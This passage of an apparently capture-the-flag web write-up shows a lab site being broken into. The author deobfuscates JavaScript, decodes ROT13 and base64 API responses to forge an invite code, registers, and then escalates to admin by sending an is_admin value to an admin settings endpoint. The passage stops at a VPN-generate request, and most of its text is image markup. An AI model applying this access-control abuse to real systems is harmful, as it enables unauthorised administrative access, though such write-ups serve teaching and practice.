/static/88dbf1dc9b36c3f0465831cf70c73e8c/679a3/url-inviteapi-min-js.png 315w, /static/88dbf1dc9b36c3f0465831cf70c73e8c/50637/url-inviteapi-min-js.png 630w, /static/88dbf1dc9b36c3f0465831cf70c73e8c/fddb0/url-inviteapi-min-js.png 945w, /static/88dbf1dc9b36c3f0465831cf70c73e8c/f46b1/url-inviteapi-min-js.png 1260w, /static/88dbf1dc9b36c3f0465831cf70c73e8c/6cdf4/url-inviteapi-min-js.png 1322w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>I used <a href="https://beautifier.io/" target="_blank">js-beautify</a> to deobfuscate the code:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 594px; " > <a class="gatsby-resp-image-link" href="/static/4c3f596bbcc8c5076aa55b0c288095b0/d369c/js-beautify.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 94.9367088607595%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAATCAYAAACQjC21AAAACXBIWXMAAAsTAAALEwEAmpwYAAACB0lEQVR42pVU2W7bQBDTjzR2rha29j60uzpsw2jsxOj//w7LlZukQYoieiA0EjQUR+Rsc7N+RPY/4KxAKhOm3QHjtEc/7Ga8XH4h5QHfbm5xs7rD6vYB6/+gWa0eIHdbuMHjfLpgfzji/HzB6fyCp9Mzzrwej08wNiB2BXf3j2/k/yZc30O6hJBGGOPZ6CGkgfURmvct6xAzIpHLyLrAh4SUepJ/v6omxysa6wKG5DHlyIYeZZhQ+nFGzzrlHtZ51Pcq3B/UWkoNIdQHNDFleN2i2BZdySTqOVqC1hpKaTZJbLfbj2ivVyHEJzQhJo6o4L3jlzVaPpRKsWEzN7ZtuwhNoJrK7K3C+RDRZwcbLJSupO2sZBFh7DILASUFfk4efQmMTeHYlgZpGG84vvo6YaIR1/lbJCpLqcOYLA7FYhirQQPdNssIayGpMHoSBo9dMrPzqZ9mg+oHFxAOc4OiEXU05xyCMyQ3zFtkPNyyf5hJqElW3X014QrWm81yUzL/UfEKu06j5AQXOgQqq+pqDqthixVWdZ4ZPO0jEt1VNY9/Bbq+WE37OmE1hQ3H0WHqPYZsMNHlVNK8PS44aOZUKrksNo65izGgREaGSuseV5clN6ndLnD5PTYGKb7HJvOA6GpspFhiyjgfAHV/hZBcOT3HxxLa2DlOi0zpciGBeQvvp5NlYWx+A3FxSfvpH9rqAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="js-beautify" title="" src="/static/4c3f596bbcc8c5076aa55b0c288095b0/d369c/js-beautify.png" srcset="/static/4c3f596bbcc8c5076aa55b0c288095b0/dda05/js-beautify.png 158w, /static/4c3f596bbcc8c5076aa55b0c288095b0/679a3/js-beautify.png 315w, /static/4c3f596bbcc8c5076aa55b0c288095b0/d369c/js-beautify.png 594w" sizes="(max-width: 594px) 100vw, 594px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>The code above contains two functions, <code class="language-text">verifyInviteCode()</code> makes a POST request to <code class="language-text">/api/v1/invite/verify</code> and <code class="language-text">makeInviteCode()</code> makes a POST request to <code class="language-text">/api/v1/invite/how/to/generate</code>.</p> <p>In Burp Suite, I sent a POST request to <code class="language-text">/api/v1/invite/how/to/generate</code> which responded with data that was encrypted using ROT13:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/582c68f2cb21620d1d5f85c72dddd583/568bb/burp-api-how-to-generate.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 43.0379746835443%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAJCAYAAAAywQxIAAAACXBIWXMAAAsTAAALEwEAmpwYAAABVElEQVR42o2SWW7DMAxEff/T9QD9SJA63mVZsnbJU1JujPaniIABCGE0fKTdWLMjp4RcCnLOVcdxgE9IGdoGOLuj754IIfzxsEo5vR+fT3T9iGYi4zQOUEph33cYY+C9r48iBXJosBbdo8UwjNXHHuccYoyXnA9I9Ka53Xo8uw7jOGJdV2itq5nDE5FX0hDx+JIUuGKeZyzLAillJS402WsiPhQo0baCzD1pgCUax6JQrvkBB7atxDTJ2pTvubH98fE0V+D9vlDQDCEENqWvjr8780hKORo1UZ3w32n6XtG4EmoR2CnUbRsydX0t/Qw9sEoHIS1VB33AXJVKOuvjrMtR0CRaeox0QRSsSHth8f5eYloXPMaN9meXKh00fTDy5gifPVxytW7wziFKtRsIWokKCj55xBIvQiZjykr4Vh79ayaYSqUp0EQDGy1sspUs5HARfgP0Zr2iL8m1QgAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="POST /api/v1/invite/how/to/generate" title="" src="/static/582c68f2cb21620d1d5f85c72dddd583/50637/burp-api-how-to-generate.png" srcset="/static/582c68f2cb21620d1d5f85c72dddd583/dda05/burp-api-how-to-generate.png 158w, /static/582c68f2cb21620d1d5f85c72dddd583/679a3/burp-api-how-to-generate.png 315w, /static/582c68f2cb21620d1d5f85c72dddd583/50637/burp-api-how-to-generate.png 630w, /static/582c68f2cb21620d1d5f85c72dddd583/fddb0/burp-api-how-to-generate.png 945w, /static/582c68f2cb21620d1d5f85c72dddd583/568bb/burp-api-how-to-generate.png 1020w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>The decrypted message said <code class="language-text">In order to generate the invite code, make a POST request to /api/v1/invite/generate</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/f5ee447d17cf99e1fd49e2ffe1c8d707/2f41e/cyberchef.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 39.87341772151899%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAICAYAAAD5nd/tAAAACXBIWXMAAAsTAAALEwEAmpwYAAABM0lEQVR42o2QbU+DMBSF+f9/TGP2wWxmk73AeJnYshYKFNpCObZzMTE6XZMnNze9PfecBvtTjKQscO4YxFCiYBm4LEGaM4qGY33cIkzWSGiME88uvFVuvqXgHQUVFPv3Apv0gEUYIjgLCaknSDOjGQy2JERaH5CLCEWXIKv2yHiMWgioXkFrA+PQytcRetCuanc3QDuCx7TGC+mw4wpr2uEhXWFJnrAiC7yWzwjZElG9wWgN7jkBqQe0bvM4juBtjw05OIfOlYiRVhGO1c710b+C8zxfCNJSwotKF3ccFVpVQU8DjFVf9KbDZKf7HBZV75xd/8YY2Msm+w3r8AmstTdRymtoBDmTENJFNp+C3vZvcSilaJoGfd//QEqJPM/BGENAXVx9FftL0D/yLvyMd3urfgBqImmNc9Z12QAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="CyberChef" title="" src="/static/f5ee447d17cf99e1fd49e2ffe1c8d707/50637/cyberchef.png" srcset="/static/f5ee447d17cf99e1fd49e2ffe1c8d707/dda05/cyberchef.png 158w, /static/f5ee447d17cf99e1fd49e2ffe1c8d707/679a3/cyberchef.png 315w, /static/f5ee447d17cf99e1fd49e2ffe1c8d707/50637/cyberchef.png 630w, /static/f5ee447d17cf99e1fd49e2ffe1c8d707/fddb0/cyberchef.png 945w, /static/f5ee447d17cf99e1fd49e2ffe1c8d707/f46b1/cyberchef.png 1260w, /static/f5ee447d17cf99e1fd49e2ffe1c8d707/2f41e/cyberchef.png 1314w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>After visiting that endpoint, a new code was generated encoded in base64:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/e5607988f9af8d1879e19f374a827c6d/020cd/burp-api-generate.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 35.44303797468354%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAHCAYAAAAIy204AAAACXBIWXMAAAsTAAALEwEAmpwYAAABF0lEQVR42oWS0W6FIBBE/f//63OvsV5QREEQBcS5u1abNk3aTebFTM6Mo5XWAxbnkGJEzvnUXgpKOVCOA9ouSCmhlwLzbJEuTzk9nzrI9/Yu0asB1TAYtHUD8WyhtYYxFs55hBCwrivCFgmSoDuFZysxThO89/DLgkhBDE+X9n1HpdSMuu4hRIeuk7DGnKBt207dpwaPj9ZAUQsOngjMPoZww/sI6PB4TJByJInTzCA2syJNARwYKFgKi3E05wT8nMVehn4BhTBompHaKThrsRGkcOq1za11jfSq3AZ/XmVpdOciDR4QCLjOMxLtc3xL5YYxZvS9gwkGNlr4RDtGj1TSTyB/pf+OG/Jr5bwj7vQ3lHzF/K77Aq/LIKBK1ueXAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="POST /api/v1/invite/generate" title="" src="/static/e5607988f9af8d1879e19f374a827c6d/50637/burp-api-generate.png" srcset="/static/e5607988f9af8d1879e19f374a827c6d/dda05/burp-api-generate.png 158w, /static/e5607988f9af8d1879e19f374a827c6d/679a3/burp-api-generate.png 315w, /static/e5607988f9af8d1879e19f374a827c6d/50637/burp-api-generate.png 630w, /static/e5607988f9af8d1879e19f374a827c6d/fddb0/burp-api-generate.png 945w, /static/e5607988f9af8d1879e19f374a827c6d/020cd/burp-api-generate.png 1027w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Once it was decoded, a valid invite code was provided:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 450px; " > <a class="gatsby-resp-image-link" href="/static/e0c8abde80345e72f4e7e011e7e3f79c/7f757/b64-decode.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 15.822784810126581%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAADCAYAAACTWi8uAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAu0lEQVR42i2O2Y6CQBRE+R8HGldQUFS6WRVU3DETdN78//djT8eHyq2kKnWPJUYBYhJj+xU/fk1vnNEbzpmGEpXWrOKNuXnZINWWrDiwjkuidY7oz3AcD0douVMjaxJleOmDsWpR9ZPy8GLbtNT7C8+/N/f2RXN6cLl1nK4dt3vH8fxLmu9w/YTBvKAf5LhehBgEWEv9LVYV4UIhZYGSpSmHiwSVVIx00dYUhuZL8e9t4Ws/0yOhGXK++QeArmnjtDzFdwAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="b64 decode" title="" src="/static/e0c8abde80345e72f4e7e011e7e3f79c/7f757/b64-decode.png" srcset="/static/e0c8abde80345e72f4e7e011e7e3f79c/dda05/b64-decode.png 158w, /static/e0c8abde80345e72f4e7e011e7e3f79c/679a3/b64-decode.png 315w, /static/e0c8abde80345e72f4e7e011e7e3f79c/7f757/b64-decode.png 450w" sizes="(max-width: 450px) 100vw, 450px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>I went to the invite code form and used the code to sign up:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 512px; " > <a class="gatsby-resp-image-link" href="/static/59e6c44a442b3cdb458ee0a96a87b55f/bc282/enter-code.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 55.69620253164557%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAALCAYAAAB/Ca1DAAAACXBIWXMAAAsTAAALEwEAmpwYAAABgklEQVR42m2S7XaCMAyGvRFF6BctKFLQIfNz081tZ57d/828S4s9yOaP5ySk6duQZDSJBaJEYMo7WMoxoe9EpJgyCXcecHmBkO98lx9yRt6hwHgqkNcci5bBWIHj6QKdFxRn3aX4JiIEYsnBlPBETAwe7QUjATVPULYxuOZQuoDUOUTqmEEaQs8gdOarH0f0J3HgXvD2ekTE3NCrBrEwSGRvezTFety347FgIlGtt2j3J6yJut1D5iV0USMtKuhF7f17jI9VdL/v9Sj0Z0KCdr3D6+cP9u/fOF6uOBDb8xeOH1c8v1zwtDuh2Z97Dm+Y1c2wwiAYMeUPl5sDqnaHmuxyc6RKO+seK5vtAJeXlcsHQ6HGOsGisVjt1kSD+aqkX7ZQs450Xg0wCwtTUisK69v1UDCzlqqsaX0q76vcCd0Eb6g8iFrfPz0vB/s6Gi6uoklrP10HU5mfLpMZQVOmmDCUI1N/FvN0UN0/wW55024tyCbeam+Dz7VbL+nFp1TA3/u/ZqlFnXWC854AAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="enter invite code" title="" src="/static/59e6c44a442b3cdb458ee0a96a87b55f/bc282/enter-code.png" srcset="/static/59e6c44a442b3cdb458ee0a96a87b55f/dda05/enter-code.png 158w, /static/59e6c44a442b3cdb458ee0a96a87b55f/679a3/enter-code.png 315w, /static/59e6c44a442b3cdb458ee0a96a87b55f/bc282/enter-code.png 512w" sizes="(max-width: 512px) 100vw, 512px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>This brought me to a registration page, so I registered a new user:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 600px; " > <a class="gatsby-resp-image-link" href="/static/a64d457b2955ad5733e3be18195ac402/ff59c/register.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 97.46835443037975%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAATCAYAAACQjC21AAAACXBIWXMAAAsTAAALEwEAmpwYAAACWUlEQVR42n1UV5biMBDkHrskS3LOCdtgTBp2mLfx/ofp7W4HwHjmo56QLErV1SXNNF3CYq0GLDWChLW0QBoOQ9NtUKaLa+awbyVxj5KwEgpH/I9o12c80drJ96UCJ1YQ12sI4gSu7z+hbs5QbBs4nn/gWg7fFhru1ZFQMRlB0xXPiYcJCXzySoGwBEhbgznONWXhN4tHwkoY92q0uyquTHSEzK7uH5wghyCpIMwqMLwIlBMyDDfCeTxC2FnUEQoiNNCLzselpoMTZRAXFUR5BXaQgO6GYPoRSMuDNfr5COUEqFpvPRVt2bOl6CeSS6JNOkLaPhLFrNJENWKCUNotISlk26hkIqIFYZJkCWm5hxM2I60aVJuDmxTgxhsevbS8Ay2xw2zwb3XvsmSpypZIKiEqathff0FxeGNsmmkUhyv4SDpfycFDJqQcEhF5SQ0KspLVmX7CsIL0U9D3haY/5XgmLQkE5bSkcYUl3/5Aebyywqw+TSLfn7n0RzL2kKSSQisUTBpuSiiwpBz/lKBSsiDc7F5A6+TxEyEp7K9bf2PSqobm7Yax2bZNiYtpYJOo7BfC/tr1oNNPH/+gwcbk+8vQnDHIkqBryrPCMSEGOt8dOD40esmG82gFyQto/aUpjxM6LaYcfvyF4/tvqC839POCfp4HZB1I/UtTxoR0GvmT7dqG+Nl2ohmIcotp2KGP+deEdJf7fE1l0PRTvCEpBruGvNni74Sfsj4yHJvnE3SQpgfK8jGb01B4xw3XYyjb5WT0DwO/NmPJC+raF5jjmzlfj97BDvTa/AefQjsvZcH4LAAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="register" title="" src="/static/a64d457b2955ad5733e3be18195ac402/ff59c/register.png" srcset="/static/a64d457b2955ad5733e3be18195ac402/dda05/register.png 158w, /static/a64d457b2955ad5733e3be18195ac402/679a3/register.png 315w, /static/a64d457b2955ad5733e3be18195ac402/ff59c/register.png 600w" sizes="(max-width: 600px) 100vw, 600px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Then, I logged in which redirected to the dashboard page:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/14441b2f326ee5940d22b48fa8f3f08f/6cdf4/dashboard.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 58.22784810126582%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAMCAYAAABiDJ37AAAACXBIWXMAAAsTAAALEwEAmpwYAAAB1klEQVR42p1SuXLbMBRk7UnhVIktEiQBggd4H5Ily4zspMxMysykzEfk+zcLkDpcJsUO9r0H7Lvg3X+8x93dB+iyxXT8inb3gm6/oD98IWaH6ThjP894ml9xPH2jfcL08obt/IaBse8/fuPXzz/wgljg8yZAECVIK42ibpBTPC0qRCp7jyRDnJx5fvHH5Dqv3ElBiYcgpKCCKiRMXSMzLVRqEMrUPRCRdtzCcmF5nK7+zPmlLhDECQVDxQqFq7DsdjDdhEgbNMMTTDNCZhW67TOyqkOS12jHPVJ2UNQDyn4LbRokxYKQyb1QamxEBBFbwcldUix/5PwaPtastt89I697ZIT15xSzsXF/ZKKeCToH241nK/PDiEbKhwcUrX04MGPlqhYuLhce68vps7ONkC5+Af2eFbItC85id5pRjmzl8IpyGuALBZ8Xl6TJla9ncGPbuOVeSMHHIHKD7YYedduiHQZUbcfl1Nz4ClM7+4yz/5bbzXtCJvj0GDjBkdUNFOv6FqaylxoU1YqycbbD6rPn7R33bVRWugpFrKC5qZRLiBODjWtRL62GemnL2tGZX8dwbZkzlGnhBhwqye2xzabnH1z+nh3yv8KzG3zw+bEperut/8VfKHVdQt+UVIgAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="dashboard" title="" src="/static/14441b2f326ee5940d22b48fa8f3f08f/50637/dashboard.png" srcset="/static/14441b2f326ee5940d22b48fa8f3f08f/dda05/dashboard.png 158w, /static/14441b2f326ee5940d22b48fa8f3f08f/679a3/dashboard.png 315w, /static/14441b2f326ee5940d22b48fa8f3f08f/50637/dashboard.png 630w, /static/14441b2f326ee5940d22b48fa8f3f08f/fddb0/dashboard.png 945w, /static/14441b2f326ee5940d22b48fa8f3f08f/f46b1/dashboard.png 1260w, /static/14441b2f326ee5940d22b48fa8f3f08f/6cdf4/dashboard.png 1322w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>I looked around the webpage but didn't find anything too useful, so next, I tried visiting the <code class="language-text">/api/v1</code> endpoint, which responded with a list of API endpoints:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/9e9ec55c8801293a1ca7de6cd7e2c0b8/ab031/api-v1.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 72.78481012658227%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAPCAYAAADkmO9VAAAACXBIWXMAAAsTAAALEwEAmpwYAAAB1UlEQVR42p1U25abMAzM/39cP6Av3T1NiCEEjG/gG7NjpXTT9iVb5ehgsDzWjKScvDMoOaPWHX9bygXGR6zBoVcdUkqMq+LP1k5++37BNE04Dd0VN3VFCAGlFPGcP5+xOff6i8LtNsJ7h3VdBXzfH0m0Zyk7cso4vb0NuHQKSimM4whjjIB77+VQsxgTzmeNvp8Zc8P9PkFrze9RLj6A2zsBNYNnDMPAA72AtQy2bZN1rUWAu04zRmOeZ9nzErfJ+pBAAN/fJwKNwn9hdnLjLxrHzZkae98O53/0ezYB7HtLbQwW0nAEDXpBIt1K4KMAzRP1WXQgaEKI1JCXlLwzbv8TsFHKuT4KwqCWTSbFfKzbQe41u88WZ3XHZRjRDRMu9x7K9PDJo+yUhlqf8IIdNCft0KkZ3VUL8HVR0NuMKcwC2vT8EuBt0fg59OjYDT/Ybi3LXMmiUFv+hPIrgK04rfFn7WHsCus2FjDArQE2WphokPf8Ncp1rwg+wbkIayOrHuGSpTsBbfsvA7YMY2SVlyDT8yhifWRVkvjvKr9OuQpgo2zsJrQ9B6Bp+B+AFTs11NZiCdRsdTD8w2iAzwPwcpVl+NmvbVI+vXA0M9bIEc1s+LyJfwDJV5W2Gt5cqQAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="GET /api/v1" title="" src="/static/9e9ec55c8801293a1ca7de6cd7e2c0b8/50637/api-v1.png" srcset="/static/9e9ec55c8801293a1ca7de6cd7e2c0b8/dda05/api-v1.png 158w, /static/9e9ec55c8801293a1ca7de6cd7e2c0b8/679a3/api-v1.png 315w, /static/9e9ec55c8801293a1ca7de6cd7e2c0b8/50637/api-v1.png 630w, /static/9e9ec55c8801293a1ca7de6cd7e2c0b8/fddb0/api-v1.png 945w, /static/9e9ec55c8801293a1ca7de6cd7e2c0b8/ab031/api-v1.png 1019w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p><code class="language-text">/api/v1/user/auth</code> checks if a user is authenticated. This endpoint responded with my current user and also showed that the <code class="language-text">is_admin</code> parameter was set to <code class="language-text">0</code> meaning that I wasn't an admin user:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/49e56ecc2315cd53890f20e2f57272fb/020cd/api-user-auth.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 31.0126582278481%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAGCAYAAADDl76dAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA/ElEQVR42n2RUY+DIBCE/f9/8F5r01IUEQQEBHS6cNr0Xm6TDQnOzn4O3TzP8KtDzhmlFBzHge+abUDJBYK/YMyCRLqq3ff903Xmpx8hJolOKQP+fEKMA5ZlQYwRKSVs29bOlGmAhiQXYM8XKoC1tnX9ns8F6QTqpsngdhvB2IBh4FBKw3uPEELrX+IDo3B4PBSEmJqpUqotvwiv6oQw6HsFziWZMkgpEYmuii9amqB7SwsNtFoa/XZq6tJK9jFkTOF+l2QoYLRGWFcUMtnPPGtXihg3IvNwPhLv35y/q9PaEr6Hmh0c/Yarj0RZVuMrn1Ioo5RJF7CS8X+Gb85f0ZPlJcrKAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="GET /api/v1/user/auth" title="" src="/static/49e56ecc2315cd53890f20e2f57272fb/50637/api-user-auth.png" srcset="/static/49e56ecc2315cd53890f20e2f57272fb/dda05/api-user-auth.png 158w, /static/49e56ecc2315cd53890f20e2f57272fb/679a3/api-user-auth.png 315w, /static/49e56ecc2315cd53890f20e2f57272fb/50637/api-user-auth.png 630w, /static/49e56ecc2315cd53890f20e2f57272fb/fddb0/api-user-auth.png 945w, /static/49e56ecc2315cd53890f20e2f57272fb/020cd/api-user-auth.png 1027w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>But there's another endpoint: <code class="language-text">/api/v1/admin/settings/update</code>, which can update the admin settings for a user. This can be done with a PUT request that provides the <code class="language-text">email</code> and <code class="language-text">is_admin</code> parameters, and the <code class="language-text">Content-Type</code> should be set to <code class="language-text">application/json</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/ddf50827283c4ccfc24f43a9483dc575/020cd/is_admin-parameter.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 37.34177215189873%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAHCAYAAAAIy204AAAACXBIWXMAAAsTAAALEwEAmpwYAAABAElEQVR42n1QCW7EIBDj/3+sVmm3uYBw5oKAO7BNulXVtWQJNGB7zJTgWJcFIQTEGCuP48AJaWZEmk18gHMW+77Xt+XNyZQS3j4lpNJgohe4f3RouxZSSiilKud5xrquSDkj5wTeCbw3LTgFsNaSuLuES4iUHsJMSIemGdF1I/q+hzHmSlo+nODc437XEEJCa11ZDM+EJ9g4WNxuigQlxnEkZ4+/yJTaQ06e0vnL7Fz/l+AwGBRKLmHIdfEeB32gPX/k6LxtgeY7trDX+39gxniKv2HSDos12Es3JJrIOdf+Hh2GcMA7ShQPvALzfqnr2NliixtiKfm76Ge+SvUs+AXawCFskrVKRgAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="is_admin parameter" title="" src="/static/ddf50827283c4ccfc24f43a9483dc575/50637/is_admin-parameter.png" srcset="/static/ddf50827283c4ccfc24f43a9483dc575/dda05/is_admin-parameter.png 158w, /static/ddf50827283c4ccfc24f43a9483dc575/679a3/is_admin-parameter.png 315w, /static/ddf50827283c4ccfc24f43a9483dc575/50637/is_admin-parameter.png 630w, /static/ddf50827283c4ccfc24f43a9483dc575/fddb0/is_admin-parameter.png 945w, /static/ddf50827283c4ccfc24f43a9483dc575/020cd/is_admin-parameter.png 1027w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>The above PUT request responded with <code class="language-text">"is_admin":1</code>, showing that my user was now an admin user. I verified this by sending a <code class="language-text">GET</code> request to <code class="language-text">/api/v1/admin/auth</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/0093e39a4319eaad9b5a8bfc26ac26e3/1a820/admin-auth-true.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 29.11392405063291%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAGCAYAAADDl76dAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA9klEQVR42n1QW46DMBDj/kfbA+w/XcojQCAwkAcJ7ky23VZVtZasJIrj2FPQYhCCZwbEGHGeZyZwYncehixoNWibGt57HMfxp0sp4WT6I+Lru4SZJxT15YKmrtAPA5ZlgXMO1lo45m5dNrVEaKsGnVJY1xXE533fs7lQwjj/G6goS4W6bqG6DpPWWIzJ4m3bsljgXMBPNUOpCeM4QLPOsO417QNsOOF61Wi7FsMwIt0vn9XF0LNmRt/PuYU0kJTSRvhmqNE0GhNXJhYnjp/uyR6Q2RE5Th04VcJ/KIgCi3nY/Gvih5F/lPUVMvwQDjaOvH82+GR4A9hi0rArtriEAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="GET /api/v1/admin/auth" title="" src="/static/0093e39a4319eaad9b5a8bfc26ac26e3/50637/admin-auth-true.png" srcset="/static/0093e39a4319eaad9b5a8bfc26ac26e3/dda05/admin-auth-true.png 158w, /static/0093e39a4319eaad9b5a8bfc26ac26e3/679a3/admin-auth-true.png 315w, /static/0093e39a4319eaad9b5a8bfc26ac26e3/50637/admin-auth-true.png 630w, /static/0093e39a4319eaad9b5a8bfc26ac26e3/fddb0/admin-auth-true.png 945w, /static/0093e39a4319eaad9b5a8bfc26ac26e3/1a820/admin-auth-true.png 1025w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p><code class="language-text">/api/v1/admin/vpn/generate</code> will generate a certificate to connect to the VPN. I sent a POST request to this endpoint and provided a <code class="language-text">username</code> parameter:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/7d395124d395793ba46158156c747db5/2cd87/admin-vpn-generate-add-username.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 72.78481012658227%; position: relative; bottom: 0; left: 0; background-image: 